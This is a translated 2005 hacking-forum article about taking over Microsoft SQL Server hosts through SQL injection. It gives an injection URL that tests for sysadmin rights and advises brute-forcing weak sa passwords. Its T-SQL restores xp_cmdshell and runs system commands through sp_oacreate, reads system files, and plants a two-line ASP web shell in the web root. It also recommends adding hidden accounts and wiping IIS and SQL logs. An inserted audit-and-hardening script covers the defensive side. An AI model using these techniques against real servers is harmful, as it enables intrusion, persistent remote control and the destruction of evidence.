Marching on xp_cmdshell (vulnerability warning, 黑吧安全网 / myhack58)

2005-11-19 00:00:00
Anonymous (佚名)
www.myhack58.com

Marching on xp_cmdshell

  • Using MSSQL extended stored procedures to obtain server administrator rights

In MSSQL, a user with sysadmin permission can execute arbitrary system commands with system privileges through the xp_cmdshell extended stored procedure, so most security-conscious administrators delete it; even where it is not deleted, the attempt may still come to nothing because of insufficient permissions. Obtaining the right to execute xp_cmdshell has therefore become the ultimate goal of most SQL Injection attack methods. Let me tell you about several key problems encountered in this process and their solutions. Consider this just a starting point.
Determining the current user's permissions
MSSQL has a total of 8 fixed server roles: sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin and bulkadmin. Each role has a different function, and each also determines our success or failure. Of these 8 roles, only membership of sysadmin is what we really want, so we only need to submit
http://somesite/show.asp?id=4864 and 1=(select IS_SRVROLEMEMBER('sysadmin'))
to determine whether the current user has sysadmin permission. If the page returns normally, congratulations, you are sure to win the lottery today! Otherwise (whoever is throwing eggs at me ^_^) we have other methods that can be used.
Cracking a weak sa password
This method does not really belong to the SQL Injection category, but it often plays a decisive role in the whole penetration process. Well, without further ado, open my most commonly used SQLScanPass, write the host IP and port 1433 into the SQLHost.txt file, and first test for a blank password; if that does not succeed, attach a good dictionary and the probability of success increases greatly. The running interface is shown in the figure.

Now we can brew a cup of coffee and wait patiently.
Detecting the extended stored procedures
If the user the current site runs as is a member of sysadmin, you can use the easy method below to detect and restore the extended stored procedures, which makes things a lot easier. If instead you obtained the weak password of sa or another account, the rest of the task can be handed over to SQLTools.exe. This program was written by Blue Glow and is more powerful than you can imagine. But apart from executing database commands, it needs certain extended stored procedures to be present, so the first thing is to determine whether these extended stored procedures exist. From the menu, open the database command execution window and fill in the command we want to execute. For example
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
is used to determine whether the xp_cmdshell extended stored procedure exists; the running interface is shown in the figure.

If the result returned is 1, we can use the "execute DOS command" option in the menu. Otherwise, read on.
Restoring xp_cmdshell and grabbing the broiler (compromised host)
Write directly in the database command execution window
Exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
If it returns 1, the restore succeeded; otherwise we need to upload an xplog70.dll file to it.
Open the file upload window, upload the file under C:\WinNt\System32\, and then execute the database command
Exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'C:\WinNt\System32\xplog70.dll'
OK, the rest is our everyday net use and net localgroup commands: add a hidden account to the server, clean the IIS logs and the MSSQL logs, and so on.
Executing system commands without xp_cmdshell
In MSSQL you can create ActiveX automation scripts through the two extended stored procedures sp_oacreate and sp_oamethod. Therefore the statements to execute a system command can be written as:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net start telnet'
Their effect is to execute net start telnet on the server through wscript.shell, thereby starting the telnet service.
You will think of FSO! Yes, we can also use it for file management, for example:
declare @o int, @f int, @t int, @ret int, @c varchar(8000)
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
select @c=''
while( @ret = 0)
begin
select @c=@c+@line+char(13)+char(10)
exec @ret = sp_oamethod @f, 'readline', @line out
end
This reads the contents of the c:\boot.ini file and stores them in the local variable @c. If you want to read it out, you need to create a temporary table and write it there.
With this method you can also create files and write data, for example:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run("cmd.exe /c "&request.querystring("cmd")) %>'
This creates an ASP Trojan of only two lines in c:\inetpub\wwwroot\foo.asp. This method avoids the large amount of useless data that a backup brings and the trouble of creating a temporary table with the sp_makewebtask extended stored procedure. It is the essential tool for home, travel and hard-disk killing.
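As an added, defender-side example that is not part of the original article: a T-SQL audit and hardening script for the three conditions the article relies on (an application login that is sysadmin, a registered xp_cmdshell, and OLE Automation procedures enabled). It assumes SQL Server 2005 or later, where both features are sp_configure options, and the login name webapp_login is a placeholder.

```sql
-- Added audit/hardening script; run as a sysadmin on SQL Server 2005 or later.

-- 1. Which logins hold sysadmin? The web application's login must not appear here,
--    because a sysadmin can re-enable every feature below at will.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 2. Is xp_cmdshell registered at all? (The same check the article uses.)
SELECT COUNT(*) AS xp_cmdshell_registered
FROM master.dbo.sysobjects
WHERE xtype = 'X' AND name = 'xp_cmdshell';

-- 3. Current state of the two options that enable the techniques above.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 4. Hardening: make sure both are off (0 = disabled).
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Least privilege: drop the application login from sysadmin.
--    webapp_login is a placeholder; use the login the web site connects with.
-- ALTER SERVER ROLE sysadmin DROP MEMBER [webapp_login];   -- SQL Server 2012+
-- EXEC sp_dropsrvrolemember 'webapp_login', 'sysadmin';     -- SQL Server 2005-2008
```

Disabling the options only raises the bar; step 5 is the change that actually removes the path the article describes, since with sysadmin the attacker re-enables both with the same sp_configure calls.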
Conclusion
MSSQL provides us with an unusually rich library of extended stored procedures that can complete the most important functions the operating system itself can complete, such as registry management, file management, user management, permission management and so on. But without sufficient security awareness, it brings a deadly threat to the server. Having said this, even I am a little afraid.